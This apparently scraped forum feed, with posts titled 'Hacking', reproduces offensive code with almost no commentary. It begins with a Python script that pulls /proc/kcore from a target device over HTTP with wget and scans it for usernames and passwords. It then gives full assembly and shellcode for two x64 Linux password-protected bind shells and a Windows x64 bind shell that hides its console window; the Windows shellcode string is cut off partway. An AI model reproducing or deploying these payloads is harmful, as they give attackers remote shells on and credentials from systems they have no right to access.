proc = subprocess.Popen("wget -qO- http://"+sys.argv[1]+"//proc/kcore > tmpstream.txt", shell=True, preexec_fn=os.setsid) os.system('echo "" >tmpstrings.out') time.sleep(1) proc2 = subprocess.Popen("tail -f tmpstream.txt | strings >>tmpstrings.out", shell=True, preexec_fn=os.setsid) print bcolors.BOLD+"hit CTRL+C to exit.."+bcolors.ENDC while 1: sys.stdout.flush() if os.stat('tmpstrings.out').st_size <= 1024: sys.stdout.write("binary data: "+str(os.stat('tmpstream.txt').st_size)+"\r") else: sys.stdout.flush() print "strings in binary data found.. password should be around line 10000" for line in tailer.follow(open('tmpstrings.out','r')): sys.stdout.flush() if done == 0: linecount+= 1 if line == macaddr: sys.stdout.flush() done = 1 print bcolors.OKGREEN+"\n\nmac address triggered.. printing the following dumps, could leak username and passwords.."+bcolors.ENDC else: sys.stdout.write(str(linecount)+"\r") elif done == 1: done = 2 print "\nfirstline.. "+bcolors.OKGREEN+line+bcolors.ENDC elif done == 2: done = 3 print "possible username: "+bcolors.OKGREEN+line+bcolors.ENDC elif done == 3: done = 4 print "possible password: "+bcolors.OKGREEN+line+bcolors.ENDC elif done == 4: done = 0 print "following line.. \n\n"+bcolors.OKGREEN+line+bcolors.ENDC else: pass signal.pause()
  15. Moeein Seven

    Hacking

    /*--------------------------------------------------------------------------------------------------------------------- /* *Title: tcp bindshell with password prompt in 162 bytes *Author: Sathish kumar *Contact: https://www.linkedin.com/in/sathish94 *Description: x64 Linux bind TCP port shellcode on port 4444 with reconfigurable password *Tested On: Ubuntu 14.04 LTS *SLAE64-1408 *Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell * ./bindshell * nc localhost 4444 * */ /* * NOTE: This C code binds on port 4444 * The top of this file contains the .nasm source code * The Port can be Reconfigured According to your needs * Instructions for changing port number * Port obtainer change the port value accorddingly * port.py * import socket * port = 4444 * hex(socket.htons(port)) * python port.py * Result : 0x5c11 * Replace the obtained value in the shellcode to change the port number * For building the from .nasm source use * nasm -felf64 filename.nasm -o filename.o * ld filename.o -o filename * To inspect for nulls * objdump -M intel -D filename.o global _start _start: jmp sock prompt: db 'Passcode' ; initilization of prompt data ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 41 sock: xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases xor rsi, rsi mul rsi push byte 0x2 ;pusing argument to the stack pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO inc esi ; already rsi is 0 so incrementing the rsi register will make it 1 push byte 0x29 ; pushing the syscall number into the rax by using stack pop rax syscall ; copying the socket descripter from rax to rdi register so that we can use it further xchg rax, rdi ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = INADDR_ANY ; bzero(&server.sin_zero, 8) ; setting up the data sctructure push 0x2 ;AF_INET value is 2 so we are pushing 0x2 mov word [rsp + 2],0x5c11 ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions push rsp ; saving the complete argument to rsi register pop rsi ; bind(sock, (struct sockaddr *)&server, sockaddr_len) ; syscall number 49 push rdx ; Inserting the null to the stack push byte 0x10 pop rdx ; value of the rdx register is set to 16 size sockaddr push byte 0x31 pop rax ; rax register is set with 49 syscall for bind syscall ;listen the sockets for the incomming connections ; listen(sock, MAX_CLIENTS) ; syscall number 50 pop rsi push 0x32 pop rax ; rax register is set to 50 syscall for listen syscall ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) ;syscall number 43 push 0x2b pop rax ; rax register is set to 43 syscall for accept syscall ; storing the client socket description mov r9, rax ; close parent push 0x3 pop rax ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent syscall xchg rdi , r9 xor rsi , rsi ; initilization of dup2 push 0x3 pop rsi ; setting argument to 3 duplicate: dec esi mov al, 0x21 ;duplicate syscall applied to error,output and input using loop syscall jne duplicate ; Prompt for password xor rax, rax inc al ; rax register to value 1 syscall for write push rax pop rdi ; rdi register to value 1 lea rsi, [rel prompt] xor rdx, rdx ; xor the rdx register to clear the previous values push 0xe pop rdx syscall ; checking the password using read password_check: push rsp pop rsi xor rax, rax ; system read syscall value is 0 so rax is set to 0 syscall push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded pop rax lea rdi, [rel rsi] scasd ; comparing the user input and stored password in the stack jne Exit execve: ; Execve format , execve("/bin/sh", 0 , 0) xor rsi , rsi mul rsi ; zeroed rax , rdx register push ax ; terminate string with null mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order push rbx push rsp pop rdi ; set RDI push byte 0x3b ; execve syscall number (59) pop rax syscall Exit: ;Exit shellcode if password is wrong push 0x3c pop rax ;syscall number for exit is 60 xor rdi, rdi syscall */ #include<stdio.h> #include<string.h> unsigned char code[] = \ "\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02" //Port number this can be obtained from the above instrcutions "\x11\x5c" "\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\x9d\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05" //Password this can be obtained by /* * python * password = 'hack' * (password[::-1]).encode('hex') * Reuslt : 6b636168 * This is stored in reverse beacuse of stack * * */ "\x68\x68\x61\x63\x6b" "\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05"; main() { printf("Shellcode Length: %d\n", (int)strlen(code)); int (*ret)() = (int(*)())code; ret(); }
  16. Moeein Seven

    Hacking

    /* ;Title: bindshell with password in 92 bytes ;Author: David Velázquez a.k.a d4sh&r ;Contact: https://mx.linkedin.com/in/d4v1dvc ;Description: x64 Linux bind TCP port shellcode on port 31173 with 4 bytes as password in 94 bytes ;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux ;Compile & Run: nasm -f elf64 -o bindshell.o bindshell.nasm ; ld -o bindshell bindshell.o ; ./bindshell ;SLAE64-1379 global _start _start: socket: ;int socket(int domain, int type, int protocol)2,1,0 xor esi,esi ;rsi=0 mul esi ;rdx,rax,rsi=0, rdx is 3rd argument inc esi ;rsi=1, 2nd argument push 2 pop rdi ;rdi=2,1st argument add al, 41 ;socket syscall syscall push rax ;socket result pop rdi ;rdi=sockfd ;struct sockaddr_in { ; sa_family_t sin_family; /* address family: AF_INET */ ; in_port_t sin_port; /* port in network byte order */ ; struct in_addr sin_addr; /* internet address */ ;}; push 2 ;AF_INET mov word [rsp + 2], 0xc579 ;port 31173 push rsp pop rsi ;rsi=&sockaddr bind: ;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen) push rdx ;initialize with 0 to avoid SEGFAULT push 16 pop rdx ;rdx=16 (sizeof sockaddr) push 49 ;bind syscall pop rax syscall listen: ;int listen(int sockfd, int backlog) pop rsi mov al, 50 ;listen syscall syscall accept: ;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) mov al, 43 ;accept syscall syscall ;store client push rax ;accept result(client) pop rdi ;rdi=client ;don't to close parent to have a small shellcode ;in a loop is necessary to close the conection!! password: ;ssize_t read(int fd, void *buf, size_t count) push rsp ;1st argument pop rsi ;2nd argument xor eax, eax ;read syscall syscall cmp dword [rsp], '1234' ;"1234" like password jne error ; if wrong password then crash program ;int dup2(int oldfd, int newfd) push 3 pop rsi dup2: dec esi mov al, 33 ;dup2 syscall applied to error,output and input syscall jne dup2 execve: ;int execve(const char *filename, char *const argv[],char *const envp[]) push rsi pop rdx ;3rd argument push rsi ;2nd argument mov rbx, 0x68732f2f6e69622f ;1st argument /bin//sh push rbx push rsp pop rdi mov al, 59 ;execve syscall error: ;SEGFAULT */ #include<stdio.h> #include<string.h> //gcc -fno-stack-protector -z execstack shellcode.c -o shellcode unsigned char code[] = \ "\x31\xf6\xf7\xe6\xff\xc6\x6a\x02\x5f\x04\x29\x0f\x05\x50\x5f\x6a\x02\x66\xc7\x44\x24\x02\x79\xc5\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x50\x5f\x54\x5e\x31\xc0\x0f\x05\x81\x3c\x24\x31\x32\x33\x34\x75\x1f\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x56\x5a\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }
  17. Moeein Seven

    Hacking

    /* # Title : Windows x64 Password Protected Bind Shell TCP shellcode # size : 825 bytes # Author : Roziul Hasan Khan Shifat # Tested On : Windows 7 x64 professional # Date : 01-01-2017 */ /* file format pe-x86-64 Disassembly of section .text: 0000000000000000 <_start>: 0: 99 cltd 1: b2 80 mov $0x80,%dl 3: 48 29 d4 sub %rdx,%rsp 6: 4c 8d 24 24 lea (%rsp),%r12 a: 48 31 d2 xor %rdx,%rdx d: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax 12: 48 8b 40 18 mov 0x18(%rax),%rax 16: 48 8b 70 10 mov 0x10(%rax),%rsi 1a: 48 ad lods %ds:(%rsi),%rax 1c: 48 8b 30 mov (%rax),%rsi 1f: 48 8b 7e 30 mov 0x30(%rsi),%rdi 23: b2 88 mov $0x88,%dl 25: 8b 5f 3c mov 0x3c(%rdi),%ebx 28: 48 01 fb add %rdi,%rbx 2b: 8b 1c 13 mov (%rbx,%rdx,1),%ebx 2e: 48 01 fb add %rdi,%rbx 31: 8b 73 1c mov 0x1c(%rbx),%esi 34: 48 01 fe add %rdi,%rsi 37: 48 31 d2 xor %rdx,%rdx 3a: 41 c7 04 24 77 73 32 movl $0x5f327377,(%r12) 41: 5f 42: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12) 49: 32 4a: 41 88 54 24 06 mov %dl,0x6(%r12) 4f: 66 ba 40 03 mov $0x340,%dx 53: 8b 1c 96 mov (%rsi,%rdx,4),%ebx 56: 48 01 fb add %rdi,%rbx 59: 49 8d 0c 24 lea (%r12),%rcx 5d: ff d3 callq *%rbx 5f: 49 89 c7 mov %rax,%r15 62: 48 31 d2 xor %rdx,%rdx 65: b2 88 mov $0x88,%dl 67: 41 8b 5f 3c mov 0x3c(%r15),%ebx 6b: 4c 01 fb add %r15,%rbx 6e: 8b 1c 13 mov (%rbx,%rdx,1),%ebx 71: 4c 01 fb add %r15,%rbx 74: 44 8b 73 1c mov 0x1c(%rbx),%r14d 78: 4d 01 fe add %r15,%r14 7b: 66 ba c8 01 mov $0x1c8,%dx 7f: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx 83: 4c 01 fb add %r15,%rbx 86: 48 31 c9 xor %rcx,%rcx 89: 66 b9 98 01 mov $0x198,%cx 8d: 48 29 cc sub %rcx,%rsp 90: 48 8d 14 24 lea (%rsp),%rdx 94: 66 b9 02 02 mov $0x202,%cx 98: ff d3 callq *%rbx 9a: 48 83 ec 58 sub $0x58,%rsp 9e: 48 83 ec 58 sub $0x58,%rsp a2: 48 31 d2 xor %rdx,%rdx a5: 66 ba 88 01 mov $0x188,%dx a9: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx ad: 4c 01 fb add %r15,%rbx b0: 6a 06 pushq $0x6 b2: 6a 01 pushq $0x1 b4: 6a 02 pushq $0x2 b6: 59 pop %rcx b7: 5a pop %rdx b8: 41 58 pop %r8 ba: 4d 31 c9 xor %r9,%r9 bd: 4c 89 4c 24 20 mov %r9,0x20(%rsp) c2: 4c 89 4c 24 28 mov %r9,0x28(%rsp) c7: ff d3 callq *%rbx c9: 49 89 c5 mov %rax,%r13 cc: 41 8b 5e 04 mov 0x4(%r14),%ebx d0: 4c 01 fb add %r15,%rbx d3: 6a 10 pushq $0x10 d5: 41 58 pop %r8 d7: 48 31 d2 xor %rdx,%rdx da: 49 89 14 24 mov %rdx,(%r12) de: 49 89 54 24 08 mov %rdx,0x8(%r12) e3: 41 c6 04 24 02 movb $0x2,(%r12) e8: 66 41 c7 44 24 02 09 movw $0xbd09,0x2(%r12) ef: bd f0: 49 8d 14 24 lea (%r12),%rdx f4: 4c 89 e9 mov %r13,%rcx f7: ff d3 callq *%rbx f9: 41 8b 5e 30 mov 0x30(%r14),%ebx fd: 4c 01 fb add %r15,%rbx 100: 6a 01 pushq $0x1 102: 5a pop %rdx 103: 4c 89 e9 mov %r13,%rcx 106: ff d3 callq *%rbx 108: 48 83 ec 58 sub $0x58,%rsp 10c: eb 12 jmp 120 <a> 000000000000010e <kick>: 10e: 48 83 c4 58 add $0x58,%rsp 112: 41 8b 5e 08 mov 0x8(%r14),%ebx 116: 4c 01 fb add %r15,%rbx 119: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx 11e: ff d3 callq *%rbx 0000000000000120 <a>: 120: 41 8b 1e mov (%r14),%ebx 123: 4c 01 fb add %r15,%rbx 126: 48 31 d2 xor %rdx,%rdx 129: 49 89 14 24 mov %rdx,(%r12) 12d: 49 89 54 24 08 mov %rdx,0x8(%r12) 132: b2 10 mov $0x10,%dl 134: 52 push %rdx 135: 4c 8d 04 24 lea (%rsp),%r8 139: 49 8d 14 24 lea (%r12),%rdx 13d: 4c 89 e9 mov %r13,%rcx 140: ff d3 callq *%rbx 142: 49 89 44 24 f8 mov %rax,-0x8(%r12) 147: 41 8b 5e 48 mov 0x48(%r14),%ebx 14b: 4c 01 fb add %r15,%rbx 14e: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx 153: 41 c7 04 24 2d 2d 3e movl $0x203e2d2d,(%r12) 15a: 20 15b: 49 8d 14 24 lea (%r12),%rdx 15f: 6a 04 pushq $0x4 161: 41 58 pop %r8 163: 4d 31 c9 xor %r9,%r9 166: 48 83 ec 58 sub $0x58,%rsp 16a: ff d3 callq *%rbx 16c: 41 8b 5e 3c mov 0x3c(%r14),%ebx 170: 4c 01 fb add %r15,%rbx 173: 4d 31 c9 xor %r9,%r9 176: 6a 08 pushq $0x8 178: 41 58 pop %r8 17a: 49 8d 14 24 lea (%r12),%rdx 17e: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx 183: ff d3 callq *%rbx 185: 41 81 3c 24 68 32 37 cmpl $0x31373268,(%r12) 18c: 31 18d: 0f 85 7b ff ff ff jne 10e <kick> 193: 41 81 7c 24 04 35 30 cmpl $0x46383035,0x4(%r12) 19a: 38 46 19c: 0f 85 6c ff ff ff jne 10e <kick> 1a2: 8b 5e 44 mov 0x44(%rsi),%ebx 1a5: 48 01 fb add %rdi,%rbx 1a8: ff d3 callq *%rbx 1aa: 48 31 d2 xor %rdx,%rdx 1ad: 41 c7 04 24 75 73 65 movl $0x72657375,(%r12) 1b4: 72 1b5: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12) 1bc: 32 1bd: 41 88 54 24 06 mov %dl,0x6(%r12) 1c2: 49 8d 0c 24 lea (%r12),%rcx 1c6: 48 83 ec 58 sub $0x58,%rsp 1ca: 66 ba 40 03 mov $0x340,%dx 1ce: 8b 1c 96 mov (%rsi,%rdx,4),%ebx 1d1: 48 01 fb add %rdi,%rbx 1d4: ff d3 callq *%rbx 1d6: 49 89 c6 mov %rax,%r14 1d9: 41 c7 04 24 46 69 6e movl $0x646e6946,(%r12) 1e0: 64 1e1: 41 c7 44 24 04 57 69 movl $0x646e6957,0x4(%r12) 1e8: 6e 64 1ea: 41 c7 44 24 08 6f 77 movl $0x4141776f,0x8(%r12) 1f1: 41 41 1f3: 41 80 74 24 0b 41 xorb $0x41,0xb(%r12) 1f9: 48 31 d2 xor %rdx,%rdx 1fc: 66 ba 2c 09 mov $0x92c,%dx 200: 44 8b 2c 16 mov (%rsi,%rdx,1),%r13d 204: 49 01 fd add %rdi,%r13 207: 49 8d 14 24 lea (%r12),%rdx 20b: 4c 89 f1 mov %r14,%rcx 20e: 41 ff d5 callq *%r13 211: 48 31 d2 xor %rdx,%rdx 214: 41 c7 04 24 43 6f 6e movl $0x736e6f43,(%r12) 21b: 73 21c: 41 c7 44 24 04 6f 6c movl $0x57656c6f,0x4(%r12) 223: 65 57 225: 41 c7 44 24 08 69 6e movl $0x6f646e69,0x8(%r12) 22c: 64 6f 22e: 41 c7 44 24 0c 77 43 movl $0x616c4377,0xc(%r12) 235: 6c 61 237: 66 41 c7 44 24 10 73 movw $0x7373,0x10(%r12) 23e: 73 23f: 41 88 54 24 12 mov %dl,0x12(%r12) 244: 49 8d 0c 24 lea (%r12),%rcx 248: 48 83 ec 58 sub $0x58,%rsp 24c: ff d0 callq *%rax 24e: 48 31 d2 xor %rdx,%rdx 251: 41 c7 04 24 53 68 6f movl $0x776f6853,(%r12) 258: 77 259: 41 c7 44 24 04 57 69 movl $0x646e6957,0x4(%r12) 260: 6e 64 262: 66 41 c7 44 24 08 6f movw $0x776f,0x8(%r12) 269: 77 26a: 41 88 54 24 0a mov %dl,0xa(%r12) 26f: 49 8d 14 24 lea (%r12),%rdx 273: 4c 89 f1 mov %r14,%rcx 276: 41 55 push %r13 278: 5b pop %rbx 279: 49 89 c5 mov %rax,%r13 27c: ff d3 callq *%rbx 27e: 4c 89 e9 mov %r13,%rcx 281: 48 31 d2 xor %rdx,%rdx 284: ff d0 callq *%rax 286: 4d 31 c0 xor %r8,%r8 289: 41 50 push %r8 28b: 5a pop %rdx 28c: 66 ba 1f 04 mov $0x41f,%dx 290: 8b 1c 96 mov (%rsi,%rdx,4),%ebx 293: 48 01 fb add %rdi,%rbx 296: 41 50 push %r8 298: 5a pop %rdx 299: b2 80 mov $0x80,%dl 29b: 49 8d 0c 24 lea (%r12),%rcx 29f: ff d3 callq *%rbx 2a1: 48 31 d2 xor %rdx,%rdx 2a4: 41 c7 44 24 f4 63 6d movl $0x41646d63,-0xc(%r12) 2ab: 64 41 2ad: 41 88 54 24 f7 mov %dl,-0x9(%r12) 2b2: b2 68 mov $0x68,%dl 2b4: 49 89 14 24 mov %rdx,(%r12) 2b8: b2 ff mov $0xff,%dl 2ba: 48 ff c2 inc %rdx 2bd: 49 8b 44 24 f8 mov -0x8(%r12),%rax 2c2: 41 89 54 24 3c mov %edx,0x3c(%r12) 2c7: 49 89 44 24 50 mov %rax,0x50(%r12) 2cc: 49 89 44 24 58 mov %rax,0x58(%r12) 2d1: 49 89 44 24 60 mov %rax,0x60(%r12) 2d6: 48 83 ec 58 sub $0x58,%rsp 2da: 48 31 c9 xor %rcx,%rcx 2dd: 4d 31 c9 xor %r9,%r9 2e0: 6a 01 pushq $0x1 2e2: 41 58 pop %r8 2e4: 4c 89 44 24 20 mov %r8,0x20(%rsp) 2e9: 48 89 4c 24 28 mov %rcx,0x28(%rsp) 2ee: 48 89 4c 24 30 mov %rcx,0x30(%rsp) 2f3: 48 89 4c 24 38 mov %rcx,0x38(%rsp) 2f8: 49 8d 14 24 lea (%r12),%rdx 2fc: 48 89 54 24 40 mov %rdx,0x40(%rsp) 301: 49 8d 54 24 68 lea 0x68(%r12),%rdx 306: 48 89 54 24 48 mov %rdx,0x48(%rsp) 30b: 4d 31 c0 xor %r8,%r8 30e: 49 8d 54 24 f4 lea -0xc(%r12),%rdx 313: 4d 31 d2 xor %r10,%r10 316: 66 41 ba 94 02 mov $0x294,%r10w 31b: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx 31f: 48 01 fb add %rdi,%rbx 322: ff d3 callq *%rbx 324: 48 31 d2 xor %rdx,%rdx 327: 52 push %rdx 328: 66 ba 29 01 mov $0x129,%dx 32c: 8b 1c 96 mov (%rsi,%rdx,4),%ebx 32f: 48 01 fb add %rdi,%rbx 332: 59 pop %rcx 333: 48 83 c4 58 add $0x58,%rsp 337: ff d3 callq *%rbx */ /* section .text global _start _start: cdq mov dl, 128 sub rsp,rdx lea r12,[rsp] xor rdx,rdx mov rax,[gs:rdx+0x60] mov rax,[rax+0x18] mov rsi,[rax+0x10] lodsq mov rsi,[rax] mov rdi,[rsi+0x30] ;kernel32.dll base address ;----------------------------------------- mov dl,0x88 mov ebx,[rdi+0x3c] add rbx,rdi mov ebx,[rbx+rdx] add rbx,rdi mov esi,[rbx+0x1c] ;kernel32.dll AddressOfFunctions add rsi,rdi ;=============================================MAIN CODE====================================================; ;loading ws2_32.dll xor rdx,rdx mov [r12],dword 'ws2_' mov [r12+4],word '32' mov [r12+6],byte dl mov dx,832 mov ebx,[rsi+rdx*4] add rbx,rdi lea rcx,[r12] call rbx mov r15,rax ;ws2_32.dll base Address ;--------------------------- xor rdx,rdx mov dl,0x88 mov ebx,[r15+0x3c] add rbx,r15 mov ebx,[rbx+rdx] add rbx,r15 mov r14d,[rbx+0x1c] add r14,r15 ;ws2_32.dll AddressOfFunctions ;--------------------------------------------- ;WSAStartup(514,&WSADATA) mov dx,114*4 mov ebx,[r14+rdx] add rbx,r15 xor rcx,rcx mov cx,408 sub rsp,rcx lea rdx,[rsp] mov cx,514 call rbx ;--------------------------------------------- ;WSASocketA(2,1,6,0,0,0) sub rsp,88 sub rsp,88 xor rdx,rdx mov dx,98*4 mov ebx,[r14+rdx] add rbx,r15 push 6 push 1 push 2 pop rcx pop rdx pop r8 xor r9,r9 mov [rsp+32],r9 mov [rsp+40],r9 call rbx mov r13,rax ;SOCKET ;---------------------------------------------------------------- ;-------------------------------------------------- mov ebx,[r14+4] add rbx,r15 ;bind() ;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16) push 16 pop r8 xor rdx,rdx mov [r12],rdx mov [r12+8],rdx mov [r12],byte 2 mov [r12+2],word 0xbd09 ;port 2493 (change it if U want) lea rdx,[r12] mov rcx,r13 call rbx ;--------------------------------------------------------- mov ebx,[r14+48] add rbx,r15 ;listen() ;listen(SOCKET,1) push 1 pop rdx mov rcx,r13 call rbx sub rsp,88 jmp a ;------------------------------------------------ ;----------------------------------------- kick: add rsp,88 mov ebx,[r14+8] add rbx,r15 ;CloseSocket() mov rcx,[r12-8] call rbx ;----------------------------------- a: mov ebx,[r14] add rbx,r15 ;accept() ;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16) xor rdx,rdx mov [r12],rdx mov [r12+8],rdx mov dl,16 push rdx lea r8,[rsp] lea rdx,[r12] mov rcx,r13 call rbx mov [r12-8],rax ;client socket ;-------------------------- ;send(SOCKET,string,4,0) mov ebx,[r14+72] add rbx,r15 ;send() mov rcx,[r12-8] mov [r12],dword 0x203e2d2d lea rdx,[r12] push byte 4 pop r8 xor r9,r9 sub rsp,88 call rbx ;------------------------------------------- mov ebx,[r14+60] add rbx,r15 ;recv() xor r9,r9 push byte 8 pop r8 lea rdx,[r12] mov rcx,[r12-8] call rbx ;------------------------ ;password: h271508F cmp dword [r12],'h271' jne kick cmp dword [r12+4],'508F' jne kick ;---------------------------------------------- ;hiding window mov ebx,[rsi+68] add rbx,rdi call rbx ;AllocConsole() ;--------------------------------------- xor rdx,rdx ;loading user32.dll mov [r12],dword 'user' mov [r12+4],word '32' mov [r12+6],byte dl lea rcx,[r12] sub rsp,88 ;reserving memory for API mov dx,832 mov ebx,[rsi+rdx*4] add rbx,rdi call rbx ;LoadLibraryA("user32") mov r14,rax ;user32.dll base ;---------------------------------------------------------------- ;-------------------------------------- ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ;Finding address of FindWindowA() mov [r12],dword 'Find' mov [r12+4],dword 'Wind' mov [r12+8],dword 'owAA' xor byte [r12+11],0x41 xor rdx,rdx mov dx,587*4 mov r13d,[rsi+rdx] add r13,rdi ;GetProcAddress() (temporary) lea rdx,[r12] mov rcx,r14 call r13 ;-------------------------------------- ;------------------------------------------------- ;FindWindowA("ConsoleWindowClass",NULL) xor rdx,rdx mov [r12],dword 'Cons' mov [r12+4],dword 'oleW' mov [r12+8],dword 'indo' mov [r12+12],dword 'wCla' mov [r12+16],word 'ss' mov [r12+18],byte dl lea rcx,[r12] sub rsp,88 call rax ;---------------------------------- ;=========================================================== xor rdx,rdx ;finding Address of ShowWindow() mov [r12],dword 'Show' mov [r12+4],dword 'Wind' mov [r12+8],word 'ow' mov [r12+10],byte dl lea rdx,[r12] mov rcx,r14 push r13 pop rbx mov r13,rax ;HWND call rbx ;------------------------------------- mov rcx,r13 xor rdx,rdx call rax ;---------------------------- ;-------------------------------------- ;RtlFillMemory(address,length,fill) xor r8,r8 push r8 pop rdx mov dx,1055 mov ebx,[rsi+rdx*4] add rbx,rdi push r8 pop rdx mov dl,128 lea rcx,[r12] call rbx ;---------------------------------------------------------- ;---------------------------------------------------------------- xor rdx,rdx mov [r12-12],dword 'cmdA' mov [r12-9],byte dl mov dl,104 mov [r12],rdx mov dl,255 inc rdx mov rax,[r12-8] mov [r12+0x3c],edx mov [r12+0x50],rax mov [r12+0x58],rax mov [r12+0x60],rax ;--------------------------------------------------- ;CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFOMATION) sub rsp,88 xor rcx,rcx xor r9,r9 push 1 pop r8 mov [rsp+32],r8 mov [rsp+40],rcx mov [rsp+48],rcx mov [rsp+56],rcx lea rdx,[r12] mov [rsp+64],rdx lea rdx,[r12+104] mov [rsp+72],rdx xor r8,r8 lea rdx,[r12-12] xor r10,r10 mov r10w,165*4 mov ebx,[rsi+r10] add rbx,rdi ;CreateProcessA() call rbx ;------------------------------------------------------ ;------------------------------ xor rdx,rdx push rdx mov dx,297 mov ebx,[rsi+rdx*4] add rbx,rdi pop rcx add rsp,88 call rbx */ #include<windows.h> #include<stdio.h> #include<string.h> #include<tlhelp32.h> char shellcode[]=\ "\x99\xb2\x80\x48\x29\xd4\x4c\x8d\x24\x24\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x48\x31\xd2\x41\xc7\x04\x24\x77\x73\x32\x5f\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0c\x24\xff\xd3\x49\x89\xc7\x48\x31\xd2\xb2\x88\x41\x8b\x5f\x3c\x4c\x01\xfb\x8b\x1c\x13\x4c\x01\xfb\x44\x8b\x73\x1c\x4d\x01\xfe\x66\xba\xc8\x01\x41\x8b\x1c\x16\x4c\x01\xfb\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\xff\xd3\x48\x83\xec\x58\x48\x83\xec\x58\x48\x31\xd2\x66\xba\x88\x01\x41\x8b\x1c\x16\x4c\x01\xfb\x6a\x06\x6a\x01\x6a\x02\x59\x5a\x41\x58\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd3\x49\x89\xc5\x41\x8b\x5e\x04\x4c\x01\xfb\x6a\x10\x41\x58\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\x41\xc6\x04\x24\x02\x66\x41\xc7\x44\x24\x02\x09\xbd\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x41\x8b\x5e\x30\x4c\x01\xfb\x6a\x01\x5a\x4c\x89\xe9\xff\xd3\x48\x83\xec\x58\xeb\x12\x48\x83\xc4\x58\x41\x8b\x5e\x08\x4c\x01\xfb\x49\x8b\x4c\x24\xf8\xff\xd3\x41\x8b\x1e\x4c\x01\xfb\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x10\x52\x4c\x8d\x04\x24\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x49\x89\x44\x24\xf8\x41\x8b\x5e\x48\x4c\x01\xfb\x49\x8b\x4c\x24\xf8\x41\xc7\x04\x24\x2d\x2d\x3e\x20\x49\x8d\x14\x24\x6a\x04\x41\x58\x4d\x31\xc9\x48\x83\xec\x58\xff\xd3\x41\x8b\x5e\x3c\x4c\x01\xfb\x4d\x31\xc9\x6a\x08\x41\x58\x49\x8d\x14\x24\x49\x8b\x4c\x24\xf8\xff\xd3\x41\x81\x3c\x24\x68\x32\x37\x31\x0f\x85\x7b\xff\xff\xff\x41\x81\x7c\x24\x04\x35\x30\x38\x46\x0f\x85\x6c\xff\xff\xff\x8b\x5e\x44\x48\x01\xfb\xff\xd3\x48\x31\xd2\x41\xc7\x04\x24\x75\x73\x65\x72\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x49\x8d\x0c\x24\x48\x83\xec\x58\x66\xba\x40\x03\x8b\x1c\x96\x48\x01\xfb\xff\xd3\x49\x89\xc6\x41\xc7\x04\x24\x46\x69\x6e\x64\x41\xc7\x44\x24\x04\x57\x69\x6e\x64\x41\xc7\x44\x24\x08\x6f\x77\x41\x41\x41\x80\x74\x24\x0b\x41\x48\x31\xd2\x66\xba\x2c\x09\x44\x8b\x2c\x16\